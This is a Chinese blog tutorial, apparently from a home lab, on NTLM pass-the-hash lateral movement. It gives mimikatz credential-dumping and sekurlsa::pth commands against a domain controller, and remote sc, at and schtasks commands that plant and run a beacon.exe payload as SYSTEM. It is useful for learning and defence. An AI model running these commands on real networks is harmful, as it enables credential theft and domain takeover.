内网渗透-哈希传递

置顶 已于 2023-10-18 14:48:21 修改
阅读量382 收藏
点赞数 2
文章标签: 哈希算法 散列表 算法 网络安全 安全
于 2023-10-18 11:03:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45953122/article/details/133901554
版权

文章目录

哈希传递

概念

早期SMB协议铭文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM

LM

image-20231009143812336

LM不安全,因为能逆向推算回去。

NTLM

image-20231009144007196

NTLM是安全的,因为使用了MD4哈希加密,哈希加密是不可逆的。

证明一个通信协议是否安全:在通信过程中,数据包能被任意的截取和修改,在这种情况下还能实现安全的传输。

原理

哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、LM Hash都不需要明文密码,因此都可以被称为Hash传递攻击。

NTLM验证靠HASH值

1.获得一台域主机的权限
2.Dump内存获得用户hash
3.通过pass the hash尝试登录其他主机
4.继续搜集hash并尝试远程登录
5.直到获得域管理员账户hash,登录域控,最终成功控制整个域

image-20231009194723350

解释:

Client:客户端

server: 开了 3389 远程服务

现在实现客户端对3389端口的一个访问

1、 client发送账户名user到server

2、 server判断本地账户名是否存在,没有则失败,有的话生成challenge,查找user对应的NTLM哈希,使用哈希加密challenge,生成一个net-ntlm hash存在内存中,将challenge发送给client

3、 client接收到challenge以后,将自己的密码转换成NTLM哈希,用生成的哈希加密challenge生成response,发送response给server

4、server对比自己内存中的net-ntlm hash与client发来的response是否一致

注意:challenge每次认证都不一样,是一个随机生成的16字节随机数,response的形势与server生成的net-ntlm hash一个格式

​ 通过认证流程我们不难看出,只要有NTLM哈希在手,哪怕不知道明文密码也可以完成NTLM的认证。

利用

hash传递 浏览上传文件

​ 当域内的用户想要访问域中的某个服务时,输入用户名和密码访问,本机kerberos服务会向KDC的AS认证服务发送一个AS-REQ认证请求。该请求包中包含:请求的用户名、客户主机名、加密类型和Authenticator(用户NTLM Hash加密的时间戳)以及一些其他信息

​ 在AS-REQ阶段,是用用户密码Hash加密的Authenticator,所以也就造成了hash传递。我们只需要获取域用户Hash,同时目标机器开放smb服务,就可以进行Hash传递攻击。

mimikatz

privilege::debug      # 提升权限(注:需以管理员权限运行)
sekurlsa::logonpasswords  # 获取内存中保存的登录信息
sekurlsa::pth /user:administrator /domain:yao.com /ntlm:367df24fb9f4383da63664de503724e5

# 弹出新窗口
dir \\192.168.160.23\c$ # 查看域控C盘目录
实操:使用域中的一台机器通过哈希传递查看域控主机的C盘目录

域控主机:192.168.160.23

域内机器:192.168.160.30

条件:域控主机与域内机器的密码相同,也就是密码转换成的NTLM哈希值相同。

使用工具:mimikatz

以管理员身份打开 mimikatz

image-20231009195639105

输入privilege::debug 来提升权限

privilege::debug

解释:

privilege::debug是Windows系统上的一个命令,它用于提升当前进程的访问权限,使其能够以调试模式执行。

image-20231009195658731

输入sekurlsa:logonpasswords 来获取内存中保存的登录信息

sekurlsa:logonpasswords

解释:

通过该命令列出当前登录用户帐户在系统中保存的明文密码和NTLM哈希。

image-20231009195908409

得到了域内主机密码的NTLM哈希:367df24fb9f4383da63664de503724e5

然后输入

sekurlsa::pth /user:administrator /domain:yao.com /ntlm:367df24fb9f4383da63664de503724e5

解释:

  • sekurlsa::pth: 表示使用“pass-the-hash”攻击技术,通过传递哈希值跳过密码验证,从而获取管理员权限。
  • /user:administrator: 指定要攻击的目标账户为administrator,即攻击目标为该计算机或域控制器的Administrator账户。
  • /domain:yao.com: 指定域名为yao.com,即攻击目标在yao.com域中。
  • /ntlm:367df24fb9f4383da63664de503724e5: 指定要使用的NTLM哈希值为367df24fb9f4383da63664de503724e5,用于进行伪造票据攻击。

image-20231009200903112

此时会弹出命令窗口,接着输入dir \\192.168.160.23\c$ 查看域控的C盘目录

dir \\192.168.160.23\c$

image-20231009202011285

查看password.txt文件:

type \\192.168.160.23\c$\password.txt

image-20231009202420215

#sc命令创建计划任务 
copy beacon.exe \\10.10.10.254\c$ 
#sc命令远程创建名为test的服务 
sc \\10.10.10.254 create test binpath= "c:\beacon.exe" 
#远程查询名为test的服务
sc \\10.10.10.254 query test
#远程启动名为test的服务
sc \\10.10.10.254 start test
#远程删除名为test的服务
sc \\10.10.10.254 delete test

#at命令(计划任务) at命令在早期的Windows系统中⽀持,⽽新版本Windows已经⽤
schtasks命令取代at命令了。
#查看⽬标系统时间
net time \\10.10.10.254
#将本⽬录下的指定⽂件复制到⽬标系统中
copy vps.exe \10.10.10.254\c$
#使⽤at创建计划任务
at \10.10.10.254 14:37 C:\vps.exe
#清除at记录
at \10.10.10.254 做业ID /delete
#使⽤at命令执⾏,将执⾏结果写⼊本地⽂本⽂件,再使⽤type命令查看该⽂件的内容
at \10.10.10.254 17:00:00 cmd.exe /c "ipconfig > C:/1.txt "
#查看⽣成的1.txt⽂件
type \10.10.10.254\C$\1.txt

#schtasks命令(计划任务)
#在⽬标主机10.10.10.254上创建⼀个名为test的计划任务,启动权限为system,启动时间为每隔⼀⼩时启动⼀次
schtasks /create /s 10.10.10.254 /tn test /sc HOURLY /mo 1 /tr
c:\beacon.exe /ru system /f /U administrator /P 1234.com
其他启动时间参数:
	/sc HOURLY 每⼩时启动⼀次
	/sc onlogon ⽤户登录时启动
	/sc onstart 系统启动时启动
	/sc onidle 系统空闲时启动
#查询该test计划任务
schtasks /query /s 10.10.10.254 /U administrator -P 1234.com |
findstr test
#启动该test计划任务
schtasks /run /s 10.10.10.254 /i /tn "test" /U administrator -P
1234.com
#删除该test计划任务
schtasks /delete /s 10.10.10.254 /tn "test" /f /U administrator -P
1234.com

hash传递获取域控RDP

privilege::debug
sekurlsa::pth /user:administrator /domain:xiusafe.com
/ntlm:a803cf45d87009c404eb89df4b1ae94c "/run:mstsc.exe
/restrictedadmin"

image-20231009205530743

如果域控这个位置是灰⾊那就不允许这种⽅式登录,注册表还能挣扎⼀下。

g_h_i
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于java的开发源码-哈希计算工具 Java-hash.zip
02-24
基于java的开发源码-哈希计算工具 Java-hash.zip 基于java的开发源码-哈希计算工具 Java-hash.zip 基于java的开发源码-哈希计算工具 Java-hash.zip 基于java的开发源码-哈希计算工具 Java-hash.zip 基于java的开发...
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
【红蓝对抗之Windows内网渗透】是一种网络安全实践,旨在暴露系统漏洞并提高安全防护能力。在企业环境中,外部防御通常严密,但内部网络的安全状况可能相对较弱,因此攻击者常利用员工电脑、外网服务或WiFi等途径...
内网渗透——哈希传递
来日可期的博客
10-09 1209
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
mimikatz hash传递--获取域控权限
qq_46635165的博客
10-18 1922
mimikatz hash传递–获取域控权限 实验环境 实验环境:win_server2012 ip:192.168.3.132 (域内普通用户,有本地管理员权限,但不知明文密码) win_server2008 ip:192.168.3.133 (DC域控,与server2012管理员密码相同,但不知明文密码) 此时,你已经拿下了域内一普通用户win_server2012 实验步骤 1,将mimikatz上传至win_server2012; 2,cd 至mimikatz目录; 3,使用reg命令,将注册表
哈希传递常用方法_hash传递工具(1)
2401_84972799的博客
05-14 710
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
内网横向移动|哈希传递PTH|mimikatz使用
qq_60115503的博客
04-25 5089
Mimikatz是法国人benjamin开发的一款强大的轻量级调式工具,本意是用来个人测试,但由于其功能强大,能够直接读取Windows-XP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具
内网渗透哈希传递
weixin_58954236的博客
10-09 331
哈希传递(Pass The。
哈希传递攻击
good good study
05-05 1467
​ 目标计算机间如果开启了默认共享又关闭了防火墙,我们如果知道它的用户名和密码,则可以进行ipc$连接。其原理是基于ntlm网络认证。但是ipc$连接需要明文的密码,假如我们只获取了密码的hash值解不出明文,该怎么连接了?此时我们可以进行hash传递(Pass-the-Hash),即输入账号和hash值,进行连接 ​
spring-data-redis-哈希操作.rar_redis-sprint
09-24
在IT行业中,Redis是一款广泛应用的高性能键值存储系统,它以数据结构服务器的形式工作,支持字符串、哈希、列表、集合、有序集合等多种数据结构。Spring Data Redis是Spring框架为Redis提供的一套全面的整合库,它...
c/c++语言程序-哈希查找
03-03
c/c++语言程序-哈希查找
c语言-哈希表-.zip
03-25
哈希表是一种在计算机科学中广泛使用的数据结构,它的核心思想是通过特定的函数(哈希函数)将数据的关键字映射到一个固定大小的数组中,以实现快速的查找、插入和删除操作。在C语言中,我们可以手动构建哈希表来...
pth-toolkit:传递哈希工具集合的修改版本可以直接开箱即用
06-26
pth-工具传递哈希工具集合的修改版本设计为便携,即使在最“裸露的骨骼”系统上也可以直接开箱即用 master 分支是为 amd64 编译的,最终目标是将这些工具交叉编译到所有可能的架构 目前,此 repo 提供以下修补工具/实用程序: winexe 微信 管理系统 客户端 客户端 获取 网 要求 sh 所有工具都在只有base包的裸机 Arch linux 安装上进行了测试。 这什么时候有用? 当您使用自定义渗透测试操作系统并且您不想自己经历编译和修补这些工具的痛苦时 用于从受感染的 *nix 主机转向 Windows 框/域的后利用! 只需克隆这个 repo 或下载 tarball 就可以传递所有的哈希值了!
pth(pass the hash)哈希传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 2678
pth(pass-the-hash)哈希传递攻击在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码域/工作组环境账号hash内网中存在和当前机器相同的密码(ps:微软打了KB22871997补丁后只有Administrator(SID 500)可以PTH成功,默认windows server 2012后都会存在补丁)
内网渗透中的mimikatz
weixin_30539835的博客
01-23 204
0x00 前言 上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz 0x01 简介 mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单 0x02 测试环境 网络资源管理模式: 域 已有资源: 域内一台主机权限 操作系统:win7 x64 域权限:普通用户...
哈希传递常用方法
路虽远,行将至。事虽难,做必达。
05-13 541
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。
域渗透之明文传递&hash传递
最新发布
qq_55202378的博客
05-16 392
在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里提供一条思路:在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。mimikaze抓取windows用户名、密码。建立IPC常见的错误代码。
p67 内网安全-域横向 smb&wmi 明文或 hash 传递
weixin_43263566的博客
04-24 567
p67 内网安全-域横向 smb&wmi 明文或 hash 传递
内网渗透 - 哈希传递攻击
LuckySec
06-06 2367
内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码
内网渗透哈希传递、获取域控权限
weixin_51559599的博客
12-15 621
使用蚁剑打开命令终端运行该程序, DMZ 主机上线。网卡2(仅主机)172.16.1.128。网卡1(桥接)10.9.47.110。域控(win 2008)(仅主机)此时 DMZ 主机还是普通用户权限。使用 dvwa 文件上传模拟漏洞。调到 low 模式上传一句话木马。使用蚁剑将木马上传到 DMZ 上。指定成功传递后与哪个主机做连接。抓取本地 ntlm hash。选择刚刚创建的 smb 监听。win11(nat 模式)访问 DMZ(win7)提权到 system。查看扫描出的内网主机。
数据结构课程设计----哈希表设计
12-24
哈希表是一种常用的数据结构,它可以高效地存储和检索数据。在哈希表中,数据元素通过哈希函数转换为索引,然后存储在数组中。哈希函数将数据元素映射到数组的特定位置,这样可以快速地访问和操作数据。 下面是一个简单的哈希表设计的示例代码: ```python class HashTable: def __init__(self): self.size = 10 self.table = [[] for _ in range(self.size)] def _hash_function(self, key): return key % self.size def insert(self, key, value): index = self._hash_function(key) self.table[index].append((key, value)) def search(self, key): index = self._hash_function(key) for item in self.table[index]: if item[0] == key: return item[1] return None def delete(self, key): index = self._hash_function(key) for i, item in enumerate(self.table[index]): if item[0] == key: del self.table[index][i] return True return False ``` 在上面的代码中,定义了一个HashTable类,它包含了插入、搜索和删除操作。哈希函数使用取余运算将键映射到数组的索引位置。插入操作将键值对添加到哈希表中,搜索操作根据键查找对应的值,删除操作根据键删除对应的键值对。 请注意,上述代码只是一个简单的示例,实际的哈希表设计可能需要更复杂的哈希函数和冲突解决方法。此外,还可以考虑动态调整哈希表的大小以提高性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值